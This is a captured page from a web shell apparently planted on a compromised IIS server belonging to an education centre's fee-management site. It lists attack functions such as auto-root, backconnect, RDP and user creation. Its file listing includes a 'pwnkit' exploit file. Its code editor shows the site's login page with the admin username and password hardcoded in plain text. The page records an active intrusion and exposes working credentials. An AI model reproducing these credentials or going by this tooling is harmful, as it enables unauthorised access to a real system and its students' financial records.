Windows NT VMI608383 10.0 build 17763 (Windows Server 2019) AMD64
Microsoft-IIS/10.0
: 144.126.137.138 | : 216.73.216.113
Cant Read [ /etc/named.conf ]
8.1.33
IWPD_484(vsec.in_n1)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
C: /
Inetpub /
vhosts /
vsec.in /
httpdocs /
ccav /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
addrec.php
4.72
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
adminhome.php
4.39
KB
-rw-rw-rw-
bdm.php
8.74
KB
-rw-rw-rw-
config.php
118
B
-rw-rw-rw-
datech.php
5.75
KB
-rw-rw-rw-
deleterecord.php
6.53
KB
-rw-rw-rw-
index.php
2.06
KB
-rw-rw-rw-
modifyrecord.php
13.15
KB
-rw-rw-rw-
nost.php
4.39
KB
-rw-rw-rw-
offpr.php
4.52
KB
-rw-rw-rw-
onfr.php
4.4
KB
-rw-rw-rw-
onpr.php
4.53
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
style1rz.css
2.35
KB
-rw-rw-rw-
uploadrec.php
5.08
KB
-rw-rw-rw-
vsec.png
277.94
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php session_start(); if(isset($_SESSION['un'])){ session_destroy(); } ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <meta name="viewport" content="width=device-width"> <title>FEE Management System</title> <link rel="stylesheet" type="text/css" href="style1rz.css"> </head> <body align="center"> <div class="page"><center> <IMG SRC="VSEC.png"> <hr> <H2><U>FEE MANAGEMENT SYSTEM</U></H2> <form method="post" action="#"> <table border="0" > <tr> <td><label for="uname" class="text">Enter Username:</label></td> <td> <input type="text" name="uname" id="uname" class="text"> </td> </tr> <tr> <td><label for="pass" class="text">Enter Password:</label></td> <td> <input type="password" name="pass" id="pass" class="text"> </td> </tr> <tr> <td colspan="2" align="center"><input type="submit" value="Login" name="submit" id="submit" class="text bu1"/> <input type="reset" value="Reset"class="text bu1"/> </tr> </table> </form> <?php if(isset($_POST["submit"])){ // Grab User submitted information $un = $_POST["uname"]; $ps = $_POST['pass']; if(empty($_POST['uname']) || empty($_POST['pass'])){ echo "<font color=red><B>Ivalid Entry, Enter Username or Password.</B></font><Br>"; } // Connect to the database else{ if($un=="admin@vsec" && $ps=="adminvsec@123") // { echo "Valid"; session_start(); $_SESSION['un'] = $un; header('Location: adminhome.php'); } else { echo "Incorrect Username or Password, Enter valid details."; } } } ?> <hr> <a href="http://www.vsecnblock.com/"> Click to visit our Home page </a> <h4>Dr. Virendra Swarup Education Center - © 2019</h4> <br> </center> </div> </body> </html>
Close